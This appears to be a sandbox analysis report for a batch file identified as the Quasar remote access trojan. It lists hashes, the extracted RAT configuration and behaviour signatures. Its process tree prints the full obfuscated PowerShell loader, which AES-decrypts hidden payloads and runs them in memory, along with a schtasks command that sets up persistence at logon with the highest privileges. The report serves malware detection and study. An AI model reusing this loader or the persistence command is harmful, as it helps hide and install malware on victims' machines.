Analysis
-
max time kernel
91s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
15-07-2024 16:14
General
-
Target
zvgfd-main/Client.bat
-
Size
1.6MB
-
MD5
439120f796ed4977f594bea8bd82cf31
-
SHA1
4584ec947309d2c0d3aa0b7af99a74e914649f1f
-
SHA256
a2ef6988f4d2669de231d1857b5fb9b64d0069252db3c017498a065f2d1574cc
-
SHA512
605f0958b42a350f9b4a01cfb47e17d6d095a4a299ad182c537016d5fb1e83c3860d4141cae74242644504aac6b3b5378e6c4551b1bba918bb793fe8e883a49b
-
SSDEEP
24576:JlkfZfen9VM4J5pHntF5rAkcVYymcJQy+DFayCGw/+MjKOqfVZ8gl5fMR/wXR9D5:JwfenPM4jFX16Y0QXS/+MuOECE6dQ
Malware Config
Extracted
quasar
1.4.2
Testing
127.0.0.1:4782
da53512e-6c73-406a-b1ee-fcfefff35b99
-
encryption_key
4B317113B678FE9A27AFEB228E60516202859C8D
-
install_name
$77~HWllo.exe.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
$77~Update
-
subdirectory
$77~TEMP
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 1 IoCs
-
Drops file in System32 directory 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Client.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xJw0qxbvy2e5E+kymgZPIMGoA6fqk1en/iSXbiH7YCA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('koOlFjUNdaFTz7/D0mS0pg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAeaN=New-Object System.IO.MemoryStream(,$param_var); $exKaE=New-Object System.IO.MemoryStream; $SIYdw=New-Object System.IO.Compression.GZipStream($EAeaN, [IO.Compression.CompressionMode]::Decompress); $SIYdw.CopyTo($exKaE); $SIYdw.Dispose(); $EAeaN.Dispose(); $exKaE.Dispose(); $exKaE.ToArray();}function execute_function($param_var,$param2_var){ $hIoGB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NhWqy=$hIoGB.EntryPoint; $NhWqy.Invoke($null, $param2_var);}$WzOZn = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Client.bat';$host.UI.RawUI.WindowTitle = $WzOZn;$QigrC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($WzOZn).Split([Environment]::NewLine);foreach ($mmglW in $QigrC) { if ($mmglW.StartsWith(':: ')) { $fLOwg=$mmglW.Substring(3); break; }}$payloads_var=[string[]]$fLOwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$77~Update" /sc ONLOGON /tr "C:\Windows\system32\$77~TEMP\$77~HWllo.exe.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\$77~TEMP\$77~HWllo.exe.exe"C:\Windows\system32\$77~TEMP\$77~HWllo.exe.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
10.8MB
-
Filesize
472KB
-
Filesize
272KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
3.1MB
-
Filesize
1.2MB
-
Filesize
32KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB